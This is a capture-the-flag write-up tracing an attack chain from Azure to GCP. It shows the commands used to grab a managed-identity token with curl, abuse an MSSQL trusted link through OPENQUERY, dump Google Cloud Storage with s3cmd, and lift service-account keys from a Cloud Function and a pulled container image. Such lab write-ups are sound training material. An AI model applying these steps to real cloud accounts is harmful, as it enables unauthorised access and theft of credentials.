Crossing the great divide

Solve

Within the same zip file, theres a initial-config.sql file. The file contains another set of credentials which we can add into our loot

initial-config.sql

From our prior enumeration, we know that the Virtual Machine has an system assigned management identity. Lets try and dump that.

Get-ChildItem env:

With the identity endpoint and token, we are able curl to get the management api.

curl "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: 41F02D3D5B464799867FCD3897A16785"
Retrieving access token

With the access token, lets connect and enumerate Az Resources.

Connecting to Az with the access token
Listing Az Resource

From the Get-AzResource output, we can see that theres a virtual machine running. Lets enumerate it more next.

Get-AzVM

Next, lets get the public IP address of the virtual machine and attempt to authenticate to it.

Get-AzPublicIpAddress -ResourceGroupName SQLANALYSIS02_GROUP
nmap scan

From the nmap output, we can see port 1433 is open, with ms-sql running on it. Lets attempt to use impacket to authenticate with the credentials we have.

Enumerating the sql server, I noticed that there is trusted link.

trusted link

Referring the payloadallthethings, letst try and attempt to exploit the trusted link.

attempting to select the version on the server on 34.74.254.28

Now that we established that we managed to access the sql server via the trusted link. Lets enumerate it again.

SELECT * FROM OPENQUERY("34.74.254.28", 'SELECT table_name FROM bulkimport.INFORMATION_SCHEMA.TABLES WHERE table_type = ''BASE TABLE''');
selecting table name
SELECT COLUMN_NAME FROM OPENQUERY([34.74.254.28], 'SELECT COLUMN_NAME FROM bulkimport.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ''myqueries''');
getting column name
SELECT * FROM OPENQUERY([34.74.254.28], 'SELECT queries FROM [bulkimport].[dbo].[myqueries]');
Output of myqueries

From the output, we can see a reference to Google Cloud Storage. GCS has interoperability with Amazon S3. So lets use s3cmd to dump the files within the GCS.

First, we configure .s3cfg file with the following data.

.s3cfg file

We are able to then use s3cmd to interact with GCS as if its a normal S3 bucket.

Listing buckets

From manual enumeration, only mp-bulk-insert and the gcf-v2-sources-454107766132-us-central1 bucket contains file. Lets download and inspect the data.

Looking at the bulkinsert.bcp and bulkinsert.fmt, it contains the format for the data to be inserted, as well as some PII data.

Next, looking at the zip file, upon unziping they both give the same file.

Looking at the source code, it is probably Google Cloud Function application, which contains hard coded Service account credentials.

main.py

Lets copy out the service account json, save it as analysis.json and authenticate with it.

I will be using the tool Bruteforce-GCP-Permissions to enumerate our permission.

From the output, it seems like analysis has alot of permissions over artifact registry. Artifact registry is basically a container registry similar to Docker Hub, but hosted on GCP.

Listing the repositories

gcloud artifacts repositories list

Listing the images in the repositories mp-default

gcloud artifacts docker images list us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default

Configuring docker to refer to the Artifact Registries.

gcloud auth configure-docker us-east1-docker.pkg.dev

Pulling the docker images

docker pull us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e

Next, we will run the docker container to enumerate the filesystems.

docker run -it us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e /bin/bash

Looking at the /app directory there is another service account json for the service account automation.

automation service account

Looking at the /root directory, we are able to retrieve the flag.

TLDR

  • Retrieve a db password from init-config.sql

  • Get Access Token for managed identity

  • Enumerate azure resources

  • Identify that there is a virtual machine running and retrieve the public IP Address

  • Perform nmap to identify open port and services

  • Utilize impacket mssqlclient to authenticate with the credentials from init-config.sql

  • Abuse trusted link to access another database on 34.74.254.28

  • Retrieve the GCS credentials from the database on 34.74.254.28

  • Authenticate to GCS and dump the files using s3cmd

  • Authenticate to gcloud with the analysisservice account json

  • Bruteforce for permissions using Bruteforce-GCP-Permissions

  • Identify that analysishas access to gcloud artifact registries

  • Enumerate and pull docker images from artifact registries

  • Retrieve automationservice account json from /app directory

  • Get the flag from the /root directory

Reference

Last updated

Was this helpful?